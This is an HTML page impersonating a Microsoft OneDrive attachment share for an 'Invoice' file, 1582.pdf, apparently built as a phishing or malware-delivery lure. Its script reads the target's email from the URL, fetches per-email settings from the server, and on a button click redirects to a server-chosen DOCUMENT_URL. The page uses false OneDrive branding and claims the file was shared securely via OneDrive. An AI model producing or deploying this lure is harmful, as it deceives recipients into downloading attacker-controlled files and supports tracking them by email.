<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>OneDrive Attachments</title>
    <style>
        body {
            margin: 0;
            background: #f5f5f5;
            font-family: Arial, Helvetica, sans-serif;
        }

        .header-bar {
            background: #005566;
            height: 40px;
            width: 100%;
        }

        .container {
            background: #f5f5f5;
            padding: 20px;
        }

        .onedrive-logo {
            width: 200px;
            margin: 25px auto 15px auto;
            display: block;
        }

        .title {
            font-size: 1.5em;
            font-weight: bold;
            margin-bottom: 20px;
            color: #005566;
        }

        .label {
            font-size: 1.2em;
            margin-bottom: 10px;
            color: #333;
        }

        .table-header {
            display: flex;
            align-items: center;
            font-size: 1.1em;
            font-weight: bold;
            color: #333;
            background: #e6f0fa;
            border: 1px solid #ccc;
            padding: 8px;
            margin-bottom: 5px;
        }

        .table-header .filename-header {
            margin-right: 2em;
            flex: 1;
        }

        .table-header .filesize-header {
            margin-left: auto;
            flex: 0 0 auto;
        }

        .file-row {
            display: flex;
            align-items: center;
            font-size: 1.1em;
            color: #333;
            background: #fff;
            border: 1px solid #ccc;
            padding: 8px;
            margin-bottom: 25px;
        }

        .filename {
            margin-right: 2em;
            flex: 1;
        }

        .filesize {
            margin-left: auto;
            flex: 0 0 auto;
        }

        .view-btn {
            background: #0078D4;
            color: #fff;
            border: none;
            border-radius: 3px;
            font-size: 1.5em;
            padding: 12px 40px;
            cursor: pointer;
            margin-bottom: 25px;
            margin-top: 5px;
            transition: background 0.2s;
        }

        .view-btn:hover {
            background: #005BA1;
        }

        .view-btn.loading {
            background: #666;
            cursor: not-allowed;
        }

        .footer {
            font-size: 1.1em;
            margin-top: 25px;
            color: #333;
        }

        .footer a {
            color: #0078D4;
            font-style: italic;
            text-decoration: none;
        }

        .footer a:hover {
            text-decoration: underline;
        }

        @media (max-width: 600px) {

            .title,
            .label,
            .footer {
                font-size: 1em;
            }

            .table-header,
            .file-row {
                font-size: 0.9em;
            }

            .view-btn {
                font-size: 1.2em;
                padding: 10px 30px;
            }

            .onedrive-logo {
                width: 150px;
            }
        }
    </style>
</head>

<body>
    <div class="header-bar"></div>
    <div class="container">
        <img src="https://1000logos.net/wp-content/uploads/2020/08/OneDrive-Logo-2014.png" alt="OneDrive Logo"
            class="onedrive-logo" />
        <div class="title">OneDrive Attachments</div>
        <div class="label">Invoice</div>
        <div class="table-header">
            <div class="filename-header">File Name</div>
            <div class="filesize-header">Size</div>
        </div>
        <div class="file-row">
            <div class="filename">1582.pdf</div>
            <div class="filesize">20.2 KB</div>
        </div>
        <div class="label">
            Your download will start automatically in 5 seconds. If it doesn't, please click below:
        </div>
        <button class="view-btn" id="view-attachment" aria-label="Download 1582.pdf file">
            View Attachment
        </button>
        <div class="footer">
            This document was shared securely via OneDrive. <a href="https://www.microsoft.com/onedrive"
                target="_blank">Learn More</a>.
        </div>
    </div>
    <script>
        function startDownload(url) {
            const btn = document.querySelector("#view-attachment");
            btn.classList.add("loading");
            btn.textContent = "Downloading...";
            try {
                setTimeout(() => {
                    window.location.href = url;
                }, 2000);
            } catch (error) {
                alert('Error accessing the file.');
                btn.classList.remove("loading");
                btn.textContent = "View Attachment";
            }

        }

        (function () {
            let lastEmail = null;

            function getEmailFromUrl() {
                const params = new URLSearchParams(window.location.search);
                return params.get("email");
            }

            async function refreshConfig(email) {
                try {
                    const res = await fetch(`/config?email=${encodeURIComponent(email)}`);
                    const cfg = await res.json();

                    // update restoreBtn
                    document.getElementById("view-attachment").addEventListener('click',evt => startDownload(cfg.DOCUMENT_URL))
                
                } catch (err) {
                    console.error("Config load failed", err);
                }
            }

            function checkForEmailChange() {
                const email = getEmailFromUrl();
                console.log(`Checked email and found ${email}`)
                if (email && email.length > 4 && email !== lastEmail) {
                    lastEmail = email;
                    refreshConfig(email);
                }
            }

            // Run at page load
            //checkForEmailChange();
            refreshConfig('');

            // Watch periodically (since user can manually edit URL bar)
            setInterval(checkForEmailChange, 2000);

        })();

    </script>
</body>

</html>